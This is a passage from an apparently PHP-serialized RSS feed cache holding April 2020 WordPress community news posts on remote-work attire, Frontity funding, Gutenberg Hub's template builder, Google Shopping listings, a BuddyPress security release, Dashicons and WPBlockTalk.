The COVID-19 pandemic has forced many of you into working from the home office. Depending on your situation, that might be the kitchen table, the loveseat in the living room, or a closet if your kids are irritating enough. The worst thing we can do is put too much pressure on ourselves to be the model of perfection in this setting. Do not let anyone tell you that you must put on the suit and tie in lieu of that comfortable pullover you’ve had since college.

\n\n\n\n

Balance that statement with some common sense. If you are meeting with the big boss over a Zoom video call, you will want to take your company culture into account. If your boss is expecting you to dress as if in the office, what he or she sees onscreen should reflect that expectation. The same may be true for client calls, depending on how you want to present your service.

\n\n\n\n

For all other situations, your dress code is entirely up to you.

\n\n\n\n

Adam Tschorn, deputy fashion editor for the Los Angeles Times, argues that you should ditch the sweatpants and “dress like the adult you’re getting paid to be”:

\n\n\n\n

Please, can we all put away those sweatpants, ratty, gray, decades-old collegiate sweatshirts and obscure minor league baseball caps and start our workdays looking like we deserve the paychecks we’re lucky enough to be earning while the world around us burns? Especially, for the love of all that’s holy, if there’s a group video conference involved?

\n\n\n\n

Twitter was not kind.

\n\n\n\n

Some of us who have been doing this remote work thing for a few years and have come to love our loungewear. We are not going to let the rookies ruin it for the rest of us, a sentiment shared by a friend on Facebook.

\n\n\n\n

I am sitting in my basketball shorts and a sleeveless T-shirt.

\n\n\n\n

Taking off your shoes is a hard requirement when entering my home, a practical cleanliness tip I learned from time spent with Korean friends. It is the respectful thing to do. Plus, it is so much more relaxing. I want you to feel at home at my home.

\n\n\n\n

Some people have trouble balancing work and home life when they are merged into one space. In those cases, “dressing for success” may help you mentally push through the day. However, it is a personal choice.

\n\n\n\n

The one thing Tschorn and I agree on wholeheartedly is ritual. If even one thing about my daily ritual gets thrown off by unforeseen circumstances, I lose focus. It can often ruin the whole day. Those little rituals are a part of what set me up for success. Everyone’s are different. Some will want their morning coffee. Others need to shower, shave, and put on their Sunday best to feel like everything is right with the world.

\n\n\n\n

There are rare days when I feel the need to switch it up. Put on a nice suit. Grab my seldom-worn fedora and place it firmly atop my head. It makes me feel like a 1920s-esque reporter who is ready to dig up some dirt on the local crime boss. Those days are about making me feel good about myself.

\n\n\n\n

However, most days, it is about feeling comfortable at home.

\n\n\n\n

It does not matter if you wear a Call of Duty T-shirt when building a new WooCommerce add-on plugin. Most people are not going to care if you don Sailor Moon sweatpants while running a successful managed WordPress hosting service. And, if you feel comfortable enough doing it, strip down to your undies while designing the next big WordPress theme. You may want to add a top while video conferencing in that last case — there are limits.

\n\n\n\n

Life is tough enough right now without fashion gurus telling us what to wear.

\n\n\n\n

Even work-from-home veterans are off our game at the moment. The world has changed practically overnight. We are still catching our breath from the gut-punch of this unique virus. We deserve to let ourselves go a bit while dealing with the stress of these changes.

\n\n\n\n

I do not know much about fashion. I still break out my cargo pants from time to time, which are apparently a fashion faux pas today.

\n\n\n\n

What I do know a little something about is working comfortably from home.

\n\n\n\n

And that, my friends, is all about what makes you feel good about yourself.

\n\n\n\n

I am probably preaching to the choir of remote developers, designers, and team managers. Many of us have been down this road and found that sweet spot that helps us get through the day. For the newcomers, welcome to our world. Kick your heels off at the door. There is no fashion-shaming here. Enjoy our guilt-free software and community in your lazy pants.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 23 Apr 2020 19:18:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"WPTavern: Frontity Raises €1M with Automattic and K Fund\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98846\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:157:\"https://wptavern.com/frontity-raises-e1m-with-automattic-and-k-fund?utm_source=rss&utm_medium=rss&utm_campaign=frontity-raises-e1m-with-automattic-and-k-fund\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4732:\"

Frontity, a free, open source framework for building WordPress themes with React, has raised €1M in funding in a round led by K Fund, with Automattic covering 22%. The team behind the framework officially made it open source in May 2019, after battle testing it internally. In one year the framework has more than 12,700 npm downloads and has built a community of 250 developers who use it.

\n\n\n\n

Frontity lowers the barrier to creating fast-loading, React-powered WordPress themes by removing the hassle of setting up and configuring all the tooling. The framework seems to have captured Automattic’s interest as a homegrown WordPress solution for facilitating decoupled setups that use React on the frontend.

\n\n\n\n

“We decided to build the framework as a response to the demand of all the big publishers we were working with,” Frontity CEO Pablo Postigo said. “This trend can drastically change the way many WordPress websites are built in the future. From my point of view, Automattic’s support means that they are also aware of this trend, and want to be close to us. In the end we are trying to make WordPress keep up with the latest technologies, and the stronger WordPress is, the better for all the companies that depend on it, including Automattic.”

\n\n\n\n

Frontity is not yet profitable and Postigo said the company is not developing a business model during this initial phase.

\n\n\n\n

“This funding round was the best way for us to make the project sustainable,” he said. “Possible monetizations that we are thinking of to generate revenue in the future are a hosting solution, premium support, or a marketplace of paid themes.”

\n\n\n\n

Frontity’s Biggest Challenge: Becoming a Compelling Alternative to PHP Themes

\n\n\n\n

Postigo identified Gatsby and Next.js as Frontity’s chief competitors in the sea of React frameworks vying for developers’ attention. He said his team takes inspiration from these frameworks and appreciates how they are raising awareness of new ways of building websites. 

\n\n\n\n

“Our biggest challenge right now is to position Frontity not as an alternative to other frameworks, but as an alternative to PHP themes,” he said. “So when developers start looking for the best way to build a superior UX they consider Frontity amongst their options.”

\n\n\n\n

Those who are already familiar with other JS frameworks like Gatsby will find that Frontity has fewer new concepts to learn, since it is 100% focused on WordPress and its APIs. Postigo identified a few other major differences between Frontity and other popular JS frameworks:

\n\n\n\n\n\n\n\n

Even with fewer new concepts to learn, Frontity remains squarely within the developers’ toolbox and is not currently a product that would appeal to non-technical users. Expanding Frontity’s user base beyond developers and breaking into the wider WordPress market is a long-term goal for the company.

\n\n\n\n

“With Frontity Framework we are on a mission to help developers build performant, scalable websites with WordPress and React easily,” Postigo said. “But the company’s ultimate goal is to make building delightful user experiences universally accessible.

“We have plans to lower the technical barrier so any WordPress user can benefit from our technology. We consider that after having released the framework the next step towards this is to build a community of developers around it, so that they can help us build themes and extensions that will make it easier for non-technical users to start using Frontity.”

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 22 Apr 2020 20:26:49 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: Gutenberg Hub Launches Online Block Template Builder\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98780\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:169:\"https://wptavern.com/gutenberg-hub-launches-online-block-template-builder?utm_source=rss&utm_medium=rss&utm_campaign=gutenberg-hub-launches-online-block-template-builder\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5301:\"

Gutenberg Hub launched the first version of its block template builder last week. The template builder allows users to select from the team’s existing library of nearly 200 templates. It is essentially an online builder that allows users to craft a full page layout by mixing and matching various sections. They can then copy the resulting output at the click of a button and paste it into the editor on their sites.

\n\n\n\n

“I intend to speed up the workflow for WordPress users to spin up beautiful Gutenberg pages, even full websites, faster,” said Munir Kamal, founder of Gutenberg Hub. “So all I am trying to do is headed in that direction.”

\n\n\n\n

Kamal has also released a Chrome browser extension that allows end-users to add templates from the growing library of options.

\n\n\n\n

“The idea is to help DIYers, freelancers, or anyone with creating new website pages faster,” he said. “I have many feature ideas to make this builder great, but I want to hear out the feedback and suggestions from the community about it.”

\n\n\n\n

Currently, Kamal is calling this version of the builder a “prototype” because he wants to validate the idea with the community before moving forward with new features.

\n\n\n\n

Using the Template Builder

\n\n\n\n

Building a template or full page is simple. Users merely need to visit the template builder page. On the page, the builder has an “Add Section” button, which will slide the template library panel open. From that point, users can choose from an extensive list of templates that includes designs for hero sections, testimonials, sliders, and more.

\n\n\n\nGutenberg Hub’s templates library.\n\n\n\n

The idea is to build a full page by combining multiple sections. Users will want to add new sections and organize them for their needs. Each section can be trashed, duplicated, or moved up/down using the available buttons.

\n\n\n\n

Trying my hand at building a simple product page, I was able to pick and choose the sections I wanted to add in just a few minutes.

\n\n\n\nCustom combination of templates with the builder.\n\n\n\n

Once everything is in place, users can copy the full template code and paste it their block editor. From that point, they can edit it on their own site.

\n\n\n\n

Sometimes, it may be necessary to copy additional CSS and insert it via the WordPress customizer or through a plugin like Blocks CSS. Some options also require users to install a plugin to use specific blocks.

\n\n\n\n

This is the type of power I want in the hands of WordPress users. Plug-and-play template systems like this will push the platform into the future. However, such systems need to be integrated directly into WordPress. Copying and pasting from a third-party website is merely a stepping stone toward that future, catering to user needs in the here and now.

\n\n\n\n

The Future of the Builder and More

\n\n\n\n

Long term, Gutenberg Hub’s work may be a better fit into the upcoming pattern system. The team could release a plugin that would integrate seamlessly into the block editor. That way, end-users could build their templates without ever leaving the comfort of the post-editing screen, or at least avoid switching between browser tabs. However, patterns are still months away from inclusion in core WordPress. In the meantime, this feels like a solid stop-gap. Plus, the team can build a nice library and garner feedback and data from users on the most popular templates/patterns.

\n\n\n\n

While Kamal wants to hear feedback before moving forward, he does have some big ideas of his own for the builder. “For example, this builder may let you create projects, and under projects, you may create multiple pages,” he said. “For each project, you may define custom branding (typography, color scheme, etc.), and all the templates from the library will adapt to that branding when you create pages under a specific project.”

\n\n\n\n

The most important thing he wants to accomplish is to build tools that speed up workflows for everyone.

\n\n\n\n

He will also open the template library to third-party developers and designers soon. There will be a public submission process. If enough people contribute, the library could balloon to an untold number of options that would be directly available as part of the builder.

\n\n\n\n

“Besides the templates and builder, I am planning something around the Gutenberg Templates API,” said Kamal. He stresses that it is still in the planning phase. If the previous work that he has put out is any indication, this could be an interesting project. He is also working on a form builder plugin for the block editor, which is currently seeing regular updates.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 22 Apr 2020 20:03:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: Google Shopping Is Now Open to Free Product Listings\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98848\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:169:\"https://wptavern.com/google-shopping-is-now-open-to-free-product-listings?utm_source=rss&utm_medium=rss&utm_campaign=google-shopping-is-now-open-to-free-product-listings\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2768:\"

Google announced today that it is bringing free listings to the Shopping tab in the United States before the end of April and will expand globally by the end of the year. Previously, merchants were required to pay for ad placement and product listings, which led to major online retailers dominating the Shopping tab.

\n\n\n\n

“Beginning next week, search results on the Google Shopping tab will consist primarily of free listings, helping merchants better connect with consumers, regardless of whether they advertise on Google,” Bill Ready, Google’s president of commerce, said. “With hundreds of millions of shopping searches on Google each day, we know that many retailers have the items people need in stock and ready to ship, but are less discoverable online.”

\n\n\n\n

This change comes at a critical time when the retail industry has taken a significant hit due to shelter-in-place orders aimed at mitigating the spread of the coronavirus. Free listings make showing up in the Google Shopping tab more accessible for independent stores.

\n\n\n\n

“For retailers, this change means free exposure to millions of people who come to Google every day for their shopping needs,” Ready said. “For shoppers, it means more products from more stores, discoverable through the Google Shopping tab.”  Existing Merchant Center users will retain their ads for specific products as promoted listings but will also now be able to list their full inventories for free.

\n\n\n\n

Google also announced a new partnership with PayPal that will streamline the onboarding process for merchants who want to link their accounts. The announcement identified WooCommerce, Shopify, and BigCommerce as existing partners that offer platforms to help businesses sell online. In light of the current crisis, WooCommerce has ramped up its efforts to make e-commerce more approachable. The team recently hosted a free webinar on how to start selling online and produced a guide to adding a store to an existing WordPress website.

\n\n\n\n

Although Google cites the coronavirus pandemic as a factor in advancing the company’s plans to make it free for merchants to sell on Google, the move is a strategic step towards wooing back the overwhelming amount of traffic it sends to Amazon. If Google’s Shopping tab can become a better source for price comparisons with a diversity of stores, consumers may return to searching Google first when intending to make a purchase.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 22 Apr 2020 02:46:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"BuddyPress: BuddyPress 5.2.0 Maintenance and Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://buddypress.org/?p=311121\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"https://buddypress.org/2020/04/buddypress-5-2-0-maintenance-and-security-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1666:\"

BuddyPress 5.2.0 is now available. This is a security and maintenance release. All BuddyPress installations are strongly encouraged to upgrade as soon as possible.

\n\n\n\n

The 5.2.0 release addresses four security issue:

\n\n\n\n\n\n\n\n

These vulnerabilities were reported privately to the BuddyPress team by Kien Hoang, in accordance with WordPress’s security policies. Our thanks to the reporter for practicing coordinated disclosure.

\n\n\n\n

Version 5.2.0 also fixes five bugs, including compatibility updates for WordPress 5.4.

\n\n\n\n

For complete details, visit the 5.2.0 changelog.

\n\n\n\n

Update to BuddyPress 5.2.0 today in your WordPress Dashboard, or by downloading from the WordPress.org plugin repository.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 21 Apr 2020 19:58:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Boone Gorges\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"WPTavern: WordPress Dashicons Project to Discontinue Development in Favor of New Icon Component\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98810\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:235:\"https://wptavern.com/wordpress-dashicons-project-to-discontinue-development-in-favor-of-new-icon-component?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-dashicons-project-to-discontinue-development-in-favor-of-new-icon-component\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3652:\"

Dashicons, the WordPress admin icon font, is now closed to new icon requests. After the block editor adopted the approach of using SVG icons directly, WordPress design contributors have recently reevaluated the efforts going into the Dashicons project. The team decided to wrap up existing tickets for new icons, push out a final release, and then pool their efforts on the new Icon component.

\n\n\n\n

“One of the challenges with an icon font is that it’s one big compiled ‘sprite,’ and so even though it gets cached well, for every icon you add the sprite grows bigger,” WordPress design contributor Joen Asmussen said in a post announcing the change. “With SVG you include just the icons you need.”

\n\n\n\n

A recently-merged pull request brings the project’s collection of 303 icons to a total of 340, with final additions including items like airplane, beer, coffee, and more, based on the remaining open issues.

\n\n\n\n

With just a handful of contributors, Dashicons had been subject to infrequent updates. Prior to WordPress 5.2 (May 2019), which updated the icon font to use WOFF2 (Web Open Font Format 2) and added 13 new icons, Dashicons had gone dormant for three years. This means that developers who needed a specific icon were sometimes waiting a long time for it to get added and often opted to use a different library.

\n\n\n\n

The new Icon component isn’t subject to the same limitations. During the design team’s recent discussion about Dashicon’s next steps, Asmussen noted that the new Icon component comes with a set of icons but developers can also feed it a custom SVG.

\n\n\n\n

“An icon doesn’t have to be part of the set for it to be treated like any other icons in the system,” Asmussen said. “Which makes it easier to say no to some social icons — we can say ‘No, but you can do this: {code example}.\'” This flexibility prevents developers from having to spend time lobbying for a particular icon to get added or working to demonstrate its popularity.

\n\n\n\n

Asmussen thanked Dashicons creator Ben Dunkle for his work in maintaining the icon font over the years. Dunkle will join the effort to improve the new Icon component as it is still being fleshed out.

\n\n\n\n

“And a lot of the lessons Ben and I learned from Dashicons could probably help spell out some principles for what fits in the component,” Asmussen said. “In some ways, I think we can be much more open to accepting icons because it doesn’t balloon a sprite. In others, as mentioned, we can decide it’s not WordPress’ place.”

\n\n\n\n

Dashicons will be maintained in core indefinitely but no new icons will be added after this point. Plugin developers have the option to continue using the icon font or embrace the new Icon component.

\n\n\n\n

“Switching to SVG in WP-admin, and perhaps the new Icon component, is a discussion definitely worth having at some point,” Asmussen said. “But [it’s] worth noting that it’s not necessarily part of today’s discussion. This is first and foremost to ensure Dashicons is in a solid place for everyone relying on it.”

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 21 Apr 2020 01:16:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"WPTavern: WPBlockTalk Videos Now Available on WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98727\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:161:\"https://wptavern.com/wpblocktalk-videos-now-available-on-wordpress-tv?utm_source=rss&utm_medium=rss&utm_campaign=wpblocktalk-videos-now-available-on-wordpress-tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2497:\"

All of the recordings from the free WPBlockTalk virtual event are now available on WordPress.tv. In case you missed it, WPBlockTalk was a WordPress community event sponsored by Automattic, and produced by Brian Richards, creator of WPSessions. It took place earlier this month on April 2, though some of its momentum may have been lost in the torrent of pandemic news. Fortunately, all the sessions that were streamed that day have been uploaded for anyone to watch.

\n\n\n\n

WPBlockTalk created moderate buzz on Twitter, but the caliber of the speakers and the density of their block editor expertise make these videos a must-watch for anyone involved in WordPress product and website development. Some of the speakers were involved in designing and building the block editor and others were early adopters who ran full speed ahead to create some of the most successful block-based plugins in the ecosystem.

\n\n\n\n

The event kicked off with a session titled The Gutenberg Roadmap led by Matt Mullenweg and Matias Ventura. It included an overview of what is coming in the full-site editing project, along with an exciting hands-on demo that fully integrates theme templates into a unified interface. Ventura estimates this basic UI will be “in a very decent state in a couple months.”

\n\n\n\n
\n\n\n\n

The other 11 sessions that follow provide an interesting look at where the block editor has been and where we can expect it to go in the near future. Topics include extensibility, case studies, accessibility, block development, and more.

\n\n\n\n

Although WPBlockTalk was originally announced on the WordPress.com News blog, the majority of the content featured in the event was geared towards those creating block-based products. More than 1,000 viewers attended WPBlockTalk, similar to the turnout for a large traditional WordCamp. These types of nimble, niche-focused virtual events were already gaining traction in 2019 and are likely to become more common in the wake of prolonged restrictions on large gatherings due to the coronavirus.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Apr 2020 22:47:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: On Digital Gardens, Blogs, Personal Spaces, and the Future\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98695\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:175:\"https://wptavern.com/on-digital-gardens-blogs-personal-spaces-and-the-future?utm_source=rss&utm_medium=rss&utm_campaign=on-digital-gardens-blogs-personal-spaces-and-the-future\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8960:\"
\n
\n

Ihave been thinking a lot about digital gardens this week. A blog post by Tom McFarlin re-introduced me to the term, which led me down a rabbit hole of interesting ideas on creating a digital space that is more personalized and tended in a way that is antithetical to the chronological blog.

\n
\n
\n\n\n\n

The concept of digital gardens is not new. It predates the modern blog, but there may be a resurgence, albeit small, of the sort of curated content that grows within a digital garden.

\n\n\n\n

The term “digital garden” is not well-defined. In general, it is a collection of thoughts, unfinished projects, links, and much more. However, it can be different and wholly unique to the individual. I would like to broaden the term to enclose any sort of website that allows you to truly browse without viewing posts chronologically. Digital gardens, collections, spaces — call it what you want.

\n\n\n\n

I began my personal website in 2003. I hacked together a main page with a few internal links. I began blogging before I knew what blogging was. This was all done with basic .txt files that I edited in Notepad on Windows. I knew enough PHP to load and display those files. My blog posts were merely random thoughts — bits and pieces of my life.

\n\n\n\n

Despite having something that worked sort of like a blog, I maintained various resources and links of other neat ideas I found around the web. It was a digital garden that I tended, occasionally plucking weeds and planting new ideas that may someday blossom into something more.

\n\n\n\n

I created a films page in which I shared 30-second trailers of short films I was planning. I maintained a list of my DVD collection. I had a page in which I showcased hate messages I received on my guestbook. All in good fun, of course. I kept a curated list of cool webpages to visit.

\n\n\n\n

All of this was a painstaking, manual process before WordPress crashed into my life, but it was still fun.

\n\n\n\n

